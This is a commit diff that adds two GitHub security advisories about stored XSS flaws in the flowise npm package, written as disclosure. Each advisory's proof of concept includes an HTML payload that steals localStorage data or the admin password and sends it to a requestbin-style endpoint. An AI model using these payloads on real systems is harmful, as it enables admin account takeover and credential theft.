Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit f4bd8d2d0aad · 2025-10-03T21:48:58.000Z
GHSA-7r4h-vmj9-wg42 GHSA-964p-j4gg-mhwc
diff --git a/advisories/github-reviewed/2025/10/GHSA-7r4h-vmj9-wg42/GHSA-7r4h-vmj9-wg42.json b/advisories/github-reviewed/2025/10/GHSA-7r4h-vmj9-wg42/GHSA-7r4h-vmj9-wg42.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7r4h-vmj9-wg42",
+  "modified": "2025-10-03T21:48:36Z",
+  "published": "2025-10-03T21:48:36Z",
+  "aliases": [],
+  "summary": "Flowise Stored XSS vulnerability through logs in chatbot",
+  "details": "### Description\nIn the chat log, tags like input and form are allowed. This makes a potential vulnerability where an attacker could inject malicious HTML into the log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information with stored Cross Site Scripting.\n\n### PoC\n```html\n<form>\n  <input type=\"image\" src=\"/assets/account-3i3qpYzs.png\" width=\"800\" height=\"400\" formaction=\"javascript:alert('XSS!!!');\" />\n</form>\n```\nIf the above HTML code is entered, a very large img gets injected into the log. When an admin clicks the generated img, it alerts ‘XSS!!!’. It means stored xss is able in the chatbot.\n```html\n<form>\n  <input type=\"image\" src=\"/assets/account-3i3qpYzs.png\" width=\"800\" height=\"400\" formaction=\"javascript:window.location.href='<YOUR_REQUESTBIN_SERVER>?passwd=' + encodeURIComponent(localStorage.getItem('password'));\" />\n</form>\n```\nSo when an admin clicks the img that generated by above html code, it sends a request, including credentials, to the attacker's IP. If attacker steal admin’s token, attacker can login as the admin in the apps.\n\n### Poc Video\n[poc](https://drive.google.com/file/d/1_3HwU0MxZ4HfJqpx2mOBjxf-WSCMM_4o/view?usp=sharing)\n\n### Impact\nAn attacker could hijack an admin account in published chatbot. This can allow attacker to view chat logs of other users and API keys.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "flowise"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "3.0.7"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-7r4h-vmj9-wg42"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/FlowiseAI/Flowise"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-03T21:48:36Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2025/10/GHSA-964p-j4gg-mhwc/GHSA-964p-j4gg-mhwc.json b/advisories/github-reviewed/2025/10/GHSA-964p-j4gg-mhwc/GHSA-964p-j4gg-mhwc.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-964p-j4gg-mhwc",
+  "modified": "2025-10-03T21:47:37Z",
+  "published": "2025-10-03T21:47:37Z",
+  "aliases": [],
+  "summary": "Flowise  vulnerable to stored XSS via \"View Messages\" allows credential theft in FlowiseAI admin panel",
+  "details": "### Summary\nA stored Cross-Site Scripting (XSS) vulnerability in FlowiseAI allows a user to inject arbitrary JavaScript code via message input. When an administrator views messages using the \"View Messages\" button in the workflow UI, the malicious script executes in the context of the admin’s browser, enabling credential theft via access to `localStorage`.\n\n---\n\n### Details\nThe vulnerability stems from a lack of input sanitization when displaying stored user messages in the admin interface. A specially crafted payload using `<iframe srcdoc=\"...\">` can include arbitrary JavaScript, which is executed when the message is rendered.\n\n---\n\n### PoC\n1. Deploy a FlowiseAI agent and make it accessible via browser (e.g., embed on a website).\n2. Send the following payload via the agent's chat interface:\n   ```html\n   <iframe srcdoc=\"<script>fetch('http://requestbin.whapi.cloud/XXXXX?d='+encodeURIComponent(JSON.stringify(localStorage)))</script>\">\n   ```\n3. As an admin, go to the workflow and click **\"View Messages\"**.\n4. The JavaScript is executed in the admin's browser, exfiltrating `localStorage` content to the attacker-controlled webhook endpoint.\n\n---\n\n### Impact\n- **Type:** Stored Cross-Site Scripting (XSS)\n- **Who is impacted:** Any admin viewing messages in the FlowiseAI UI\n- **Data at risk:** Admin credentials, or sensitive info stored in `localStorage`\n- **Severity:** High (Account takeover, admin privilege escalation, full panel compromise)\n\n---\n\n### Affected Products\n- **Ecosystem:** `npm`\n- **Package name:** `flowise`\n- **Affected versions:** `< 2.2.7`\n- **Patched versions:**`1`",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "flowise"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "2.2.7-patch.1"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-964p-j4gg-mhwc"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/FlowiseAI/Flowise"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-03T21:47:37Z",
+    "nvd_published_at": null
+  }
+}
